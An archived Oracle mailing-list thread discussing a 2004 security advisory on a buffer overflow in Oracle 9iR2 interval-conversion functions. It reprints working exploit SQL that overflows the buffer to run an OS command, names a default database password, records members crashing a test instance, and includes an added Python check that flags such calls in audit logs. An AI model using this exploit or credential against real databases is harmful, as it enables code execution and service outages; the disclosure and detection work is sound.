Oracle 9.2.0.3 on Win2K, shut down the instance and the Oracle service.

Pretty serious bug to me.

mohammed

--- Jared.Still@(protected) wrote:
> Has anyone here heard of this?
>
> First I've seen it. Could not get the exploit to work on 8i or 9i,
> haven't tried 10g.
>
> It does however cause an ORA-3113 (See ORA-3113.ora-code.com).
>
> Jared
>
> =================================
>
> The following security advisory is sent to the securiteam mailing list,
> and can be found at the SecuriTeam web site: http://www.securiteam.com
> - - promotion
>
> The SecuriTeam alerts list - Free, Accurate, Independent.
>
> Get your security news from a reliable source.
> http://www.securiteam.com/mailinglist.html
>
>
> - - - - - - - - -
> Oracle Database 9ir2 Interval Conversion Buffer Overflow
>
> Oracle Database Server is one of the most used database servers in the
> world. It was marketed as being unbreakable, and many people think that it
> is one of the most secure database servers on the market.
>
> Oracle Database Server provides two functions that can be used with PL/SQL
> to convert numbers to date/time intervals; these functions have buffer
> overflow vulnerabilities.
>
> Vulnerable Systems:
> * Oracle Database version 9ir2 and prior
>
> When either of these conversion functions is called with a long string as
> the second parameter, a buffer overflow occurs.
>
> To reproduce the overflow, execute the next PL/SQL:
> SELECT NUMTOYMINTERVAL(1, 'longstringhere') from dual;
> SELECT NUMTODSINTERVAL(1, 'longstringhere') from dual;
>
> Any Oracle Database user can exploit this vulnerability because access to
> these functions can't be restricted. Exploitation of this vulnerability
> allows an attacker to execute arbitrary code; it can also be exploited to
> cause a DoS (denial of service) by killing the Oracle server process. An
> attacker can completely compromise the OS and database if Oracle is running
> on the Windows platform, because Oracle must run under the Local System
> account or under an administrative account. If Oracle is running on *nix,
> then only the database could be compromised, because Oracle mostly runs
> under the oracle user, which has restricted permissions.
>
> Important: Exploitation of these vulnerabilities becomes easy if Oracle
> Internet Directory has been deployed, because Oracle Internet Directory
> creates a database user called ODSCOMMON that has the default password
> ODSCOMMON. This password can not be changed, so any attacker can use this
> user to connect to the database and exploit these vulnerabilities.
>
> Full tests on Oracle database 9ir2 under Microsoft Windows 2000 Server and
> Linux confirm these vulnerabilities. Versions running on other OS
> platforms are believed to be affected too. Previous Oracle Database Server
> versions could be affected by these vulnerabilities.
>
>
> Exploits:
> -- These exploits should work on Windows 2000 Server and Windows XP; not
> tested on Windows 2003.
> -- Run any command at the end of the string
> SELECT NUMTOYMINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
> chr(59) || chr(79) || chr(150) || chr(01) || chr(141) || chr(68) ||
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21) || chr(52) || chr(35) ||
> chr(148) || chr(01) || chr(255) || chr(37) || chr(172) || chr(33) ||
> chr(148) || chr(01) || chr(32) || 'echo ARE YOU SURE? >c:\Unbreakable.txt')
> FROM DUAL;
>
> SELECT NUMTODSINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
> chr(59) || chr(79) || chr(150) || chr(01) || chr(141) || chr(68) ||
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21) || chr(52) || chr(35) ||
> chr(148) || chr(01) || chr(255) || chr(37) || chr(172) || chr(33) ||
> chr(148) || chr(01) || chr(32) || 'echo ARE YOU SURE? >c:\Unbreakable.txt')
> FROM DUAL;
>
> Vendor Fix:
> Go to Oracle Metalink site, http://metalink.oracle.com.
>
> Vendor Contact:
> Oracle was contacted and they released a fix without telling the public
> nor Cesar anything and without issuing an alert.
>
> Additional Information:
> The information has been provided by Cesar.
>
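A defender-side check for the pattern the advisory describes, added here as an example (it is not part of the advisory, of the thread, or of Oracle's software): it scans captured SQL statements, such as those from an audit trail, for calls to NUMTOYMINTERVAL and NUMTODSINTERVAL whose second argument is not a plain string literal naming one of the unit keywords the Oracle SQL reference documents for these functions. The function names and the sample statements are constructed for this example.

```python
import re
# Unit keywords the Oracle SQL reference documents for each function's second argument.
UNITS = {
    "NUMTOYMINTERVAL": {"YEAR", "MONTH"},
    "NUMTODSINTERVAL": {"DAY", "HOUR", "MINUTE", "SECOND"},
}
CALL_RE = re.compile(r"\b(NUMTOYMINTERVAL|NUMTODSINTERVAL)\s*\(", re.IGNORECASE)

def _split_args(sql, start):
    """Top-level comma-separated arguments of the call whose '(' precedes sql[start]."""
    args, cur, depth, quoted = [], [], 0, False
    for ch in sql[start:]:
        if quoted or ch == "'":
            quoted ^= (ch == "'")          # enter/leave a single-quoted literal
        elif ch == "(":
            depth += 1
        elif ch == ")":
            if depth == 0:
                break                      # closing parenthesis of the call itself
            depth -= 1
        elif ch == "," and depth == 0:
            args.append("".join(cur).strip())
            cur = []
            continue
        cur.append(ch)
    args.append("".join(cur).strip())      # last argument (or all text if unterminated)
    return args

def suspicious_interval_calls(sql):
    """(function, unit_argument, reason) for each call whose unit argument is not
    a plain string literal naming a documented unit keyword."""
    findings = []
    for m in CALL_RE.finditer(sql):
        func, args = m.group(1).upper(), _split_args(sql, m.end())
        if len(args) < 2:
            continue
        lit = re.fullmatch(r"'([^']*)'", args[1])
        if lit is None:  # concatenation, chr() bytes, bind or column: needs review
            findings.append((func, args[1], "unit argument is not a plain string literal"))
        elif lit.group(1).strip().upper() not in UNITS[func]:
            findings.append((func, args[1], "unit literal is not a documented keyword"))
    return findings

# Constructed sample statements, as they might appear in an audit trail.
SAMPLE_SQL = [
    "SELECT NUMTODSINTERVAL(30, 'MINUTE') FROM dual",
    "SELECT numtoyminterval(2, 'month') AS i FROM dual",
    "SELECT NUMTOYMINTERVAL(1, 'longstringhere') FROM dual",
    "SELECT NUMTODSINTERVAL(1, 'AAAA' || chr(59) || chr(79)) FROM dual",
]
```

Only the third and fourth sample statements are reported; a bind variable or column expression in the second argument is also reported, since the check cannot see its runtime value.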
Here's a link to the posting on BugTraq:

http://cert.uni-stuttgart.de/archive/ntbugtraq/2004/02/msg00015.html

Jared.Still@(protected)
Sent by: oracle-l-bounce@(protected)
02/26/2004 01:25 PM
Please respond to oracle-l
To: oracle-l@(protected)
cc:
Subject: Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow

Mohammed,

Your email inspired me to try it on a local database.

After starting up a 9.2 database on my laptop, I ran the query.

It did indeed create the file.

The sqlplus session appears to be hung.

The instance is still up though, as I can login from another CMD window.

Next I tried running the query on a remote 9.2.0.3 instance on a Win2k server.

It's running SAP, but as it is our test server it is generally safe to crash it without
repercussions.

Which is exactly what happened. The query crashed the instance, killed the service.

Agreed, it is a dangerous bug.

Jared

mkb <mkb125@(protected)>
Sent by: oracle-l-bounce@(protected)
02/26/2004 12:33 PM
Please respond to oracle-l
To: oracle-l@(protected)
cc:
Subject: Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow